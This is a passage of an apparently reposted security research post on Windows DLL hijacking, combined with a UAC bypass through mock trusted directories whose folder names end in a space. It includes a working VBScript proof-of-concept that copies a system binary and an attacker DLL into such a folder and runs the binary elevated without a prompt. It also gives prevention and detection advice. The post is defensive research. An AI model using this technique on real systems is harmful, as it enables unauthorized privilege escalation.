:x: wsmanhttpconfig.exe HTTPAPI.dll HttpTerminate
:x: wsmanhttpconfig.exe mi.dll DllMain
:x: wsmanhttpconfig.exe miutils.dll DllMain
:x: wsmprovhost.exe DSROLE.dll DllMain
:x: wsmprovhost.exe mi.dll DllMain
:x: wsmprovhost.exe miutils.dll DllMain

Some caveats:

  • The test was performed by simply running each executable, without specifying any parameters and with no further user interaction. This explains why the well-documented xwizard.exe DLL hijack [ 15 ] is not present in this list, because it requires two (arbitrary) arguments for it to work.
  • Some applications come with a GUI, or some other visual element that gives away the binary was executed. This also includes error messages: required DLLs might be missing, and the hijacked DLL obviously lacks the original functionality. Attackers are less likely to target such applications for DLL hijacking purposes.
  • DLLs of which the original version was written in C++ have not been taken into account.

A CVS version of the full list can be found on GitHub [ 14 ].

Combining with UAC bypass

Having found all these executables, at most this allows us to execute code through trusted programs. However, it is also possible to gain elevated rights if used in conjunction with UAC Bypass techniques.

User Account Control (UAC) [ 16 ] was introduced in Windows Vista as a security feature, asking users for confirmation through a prompt before a process running under normal privileges is elevated to higher privileges. After users complained about getting flooded with UAC prompts when doing arbitrary tasks, Microsoft introduced auto elevation in Windows 7, which automatically elevates certain processes if they are located in trusted directories (such as c:\windows\system32 ).

With this in mind, you could try running arbitrary code with elevated privileges by using an executable that is marked for auto elevation that is also vulnerable to DLL hijacking. There are about 35 of such executables, as can be seen in the previous section. The problem to overcome is that of the trusted directory: both the auto-elevate executable and the custom DLL need to be located in a trusted directory, but none of theses are user writeable.

There is some excellent research about bypassing UAC out there - one of my favourite techniques is the mocking of trusted directories using trailing spaces [ 17 ]. I would recommend reading the full blog post, but it boils down to users being able to create c:\windows \system32\ (note the space after the first folder), and auto-elevate executables placed in this folder consider this a trusted location.

It is debatable whether this is a proper security vulnerability - Microsoft argue it is not [ 18 ], but it is at least a flaw, given that most (non-enterprise) Windows computers are using ‘administrator accounts’ by default.

Either way, this provides us with an excellent means through which DLL hijacking can be made much more powerful. Note that folders with trailing spaces cannot be created through traditional means on Windows. You could compile some lines of C to do this, as is done by the original researcher, but it turns out VBScript can actually do this for us too. The following proof-of-concept shows that with only a few lines of code you can get this to work:

Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")

' Get target binary and payload
WScript.StdOut.Write("System32 binary: ")
strBinary = WScript.StdIn.ReadLine()
WScript.StdOut.Write("Path to your DLL: ")
strDLL = WScript.StdIn.ReadLine()

' Create folders
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If

' Copy legit binary and evil DLL
oFSO.CopyFile ("c:\windows\system32\" & strBinary), target_binary
oFSO.CopyFile strDLL, target_sys32
' Run, Forrest, Run!
wshshell.Run("""" & target_binary & """")

' Clean files
WScript.StdOut.Write("Clean up? (press enter to continue)")
WScript.StdIn.ReadLine()
wshshell.Run("powershell /c ""rm -r """"\\?\" & target & """""""") 'Deletion using VBScript is problematic, use PowerShell instead

The screenshot below shows what execution of the script might look like.

Hijacking DLLs in Windows An example showing an elevated prompt after a malicious dxgi.dll was loaded by a legitimate winsat.exe from a mocked trusted directory, without getting any UAC prompts.

In the table above, all executable/DLL combinations for which the auto elevation was successful are marked in the first column. With over 160 possible combinations, there are quite some options.

Prevention and detection

A simple way to prevent DLL hijacking from happening would be for applications to always use absolute paths instead of relative ones. Although some applications (notably portable ones) will not always be able to do so, applications located in \system32\ and relying on DLLs in the same folder have no excuse for doing otherwise. The better option, which only very few Windows executables seem to do, is to verify all DLLs before loading them (e.g. by checking their signatures) - this would largely eliminate the problem.

Nevertheless, as we have seen, attackers will still be able to bring older versions of legitimate/trusted applications that can be exploited. So even if every application starts checking their DLLs before loading them from now on, we would still have to deal with this problem.

Let’s therefore focus on detection. You could hunt for the creation or loading of any of the DLLs mentioned before from unexpected paths, particularly in temp locations such as %appdata% . After all, the name of the (legitimate) application loading the DLLs can be changed, but the filenames of DLLs are always fixed. A sample Sigma rule for this can be found here [ 19 ] - it successfully detects our DLL hijacking, although as you can see, it doesn’t scale very well and is likely to be prone to false positives. You could take a more generic approach by looking for the presence of Microsoft-signed binaries in unexpected locations, of the loading of DLLs from unexpected locations by such Microsoft-signed binaries (regardless of location).

Finally, the demonstrated UAC bypass technique can be detected easily and reliably by looking for any activity in the /windows / folder, or in any folders ending in a space for that matter. As described before, Windows folders with trailing spaces cannot be created through normal means and should therefore be rare, and always suspicious. Setting your UAC mode to ‘Always notify’, one level higher than the default, will prevent this and other similar UAC bypass techniques from succeeding.

Posted on 2020-06-22


以上所述就是小编给大家介绍的《Hijacking DLLs in Windows》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

程序员面试宝典(第5版)

程序员面试宝典(第5版)

欧立奇、刘洋、段韬 / 电子工业出版社 / 2015-10 / 55.00

容提要 《程序员面试宝典(第5版)》是《程序员面试宝典》的第5 版,在保留第4 版的数据结构、面向对象、程序设计等主干的基础上,修正了前4 版近40 处错误,解释清楚一些读者提出的问题,并使用各大IT 公司及相关企业最新面试题(2014-2015)替换和补充原内容,以反映自第4 版以来两年多的时间内所发生的变化。 《程序员面试宝典(第5版)》取材于各大公司面试真题(笔试、口试、电话面试......一起来看看 《程序员面试宝典(第5版)》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具